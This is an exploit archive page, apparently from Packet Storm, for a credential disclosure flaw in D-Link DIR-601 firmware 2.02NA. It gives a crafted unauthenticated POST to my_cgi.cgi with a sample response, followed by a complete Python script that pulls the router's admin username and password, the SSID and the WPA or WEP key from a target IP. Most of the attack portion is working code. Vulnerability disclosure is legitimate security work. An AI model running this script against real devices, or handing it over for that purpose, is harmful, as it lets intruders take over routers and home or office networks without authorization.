Twenty Year Anniversary

D-Link DIR601 2.02 Credential Disclosure

D-Link DIR601 2.02 Credential Disclosure
Posted Jul 10, 2018
Authored by Richard Rogerson

D-Link DIR601 version 2.02 suffers from a credential disclosure vulnerability.

tags | exploit, info disclosure
MD5 | c61414fb5926f355ef5323c1ac400496

D-Link DIR601 2.02 Credential Disclosure

Change Mirror Download
# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
# Date: 2018-07-10
# Exploit Author: Richard Rogerson
# Vendor Homepage: http://ca.dlink.com/
# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
# Version: <= 2.02NA
# Tested on: D-Link DIR601 Firmware 2.02NA
# Contact: http://twitter.com/pktlabs
# Website: https://www.packetlabs.net
# CVE: N/A
# Category: Webapps, Remote


# 1. Description:
# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
# a HTTP request was found responsible for the handoff to client-side code.
# Inspecting the HTTP requests, it was identified that a parameter named atable_namea
# is used to instruct the back-end application which content to return. By abusing this
# request, it was found possible to retrieve sensitive information relating to the device
# configuration and administrative credentials.

# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
# to retrieve the administrative credentials, wireless ssid, and pre-shared key where
# applicable. Enumerating the naming conventions within the client-side code, it was
# determined that a number of potentially sensitive parameters/tables exist in the
# back-end environment which provide significant value if retrieved, four of these include:

# - Admin_user
# - Wireless_settings
# - Wireless_security
# - Wireless_wpa_settings

Sample of the vulnerable POST request:

HTTP Request
POST /my_cgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.0.1/login_real.htm
Content-Length: 86
Connection: close
Pragma: no-cache
Cache-Control: no-cache

request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested

Sample response:

HTTP Response
HTTP/1.1 200 OK
Content-type: text/xml
Connection: close
Date: Sat, 01 Jan 2011 00:57:12 GMT
Server: lighttpd/1.4.28
Content-Length: 228

<?xml version="1.0"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root>


# 2. Exploit Code:

#!/usr/bin/python
import socket,sys,urllib,urllib2
import xml.etree.ElementTree as ET

print """Packetlabs
====================================
D-Link DIR-601 Authorization Bypass
"""
if len(sys.argv) != 2:
print "usage:",sys.argv[0],"<ipaddr>"
sys.exit()
else:
ipaddr=sys.argv[1]
print "Retrieving admin username, password and wireless security configuration from",ipaddr

# build URL
url = 'http://'
url+= ipaddr
url+='/my_cgi.cgi'
data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"

# send payload
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print "Sending payload to:",response.geturl()
retr = response.read()
root = ET.fromstring(retr)

# credential dump
print "\r\nAdmin Creds"
print "username:",root[0][0].text
print "password:",root[0][1].text

# dump wireless settings
print "\r\nWireless Settings"
sectype=int(root[3][0].text)
ssid=root[2][2].text
enctype="none"

print "SSID is:", ssid
if sectype == 2:
enctype="WPA2"
key=root[4][3].text
elif sectype == 1:
enctype="WEP("
keylength=int(root[3][3].text)
if keylength == 5:
enctype+="64bit)"
key=root[3][5].text
elif keylength == 13:
enctype+="128bit)"
key=root[3][9].text
else:
key="Error, please inspect xml manually above, keylength=",keylength
print retr
elif sectype == 0:
print "Wireless network is open?"
sys.exit()

print enctype,"key is:",key



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close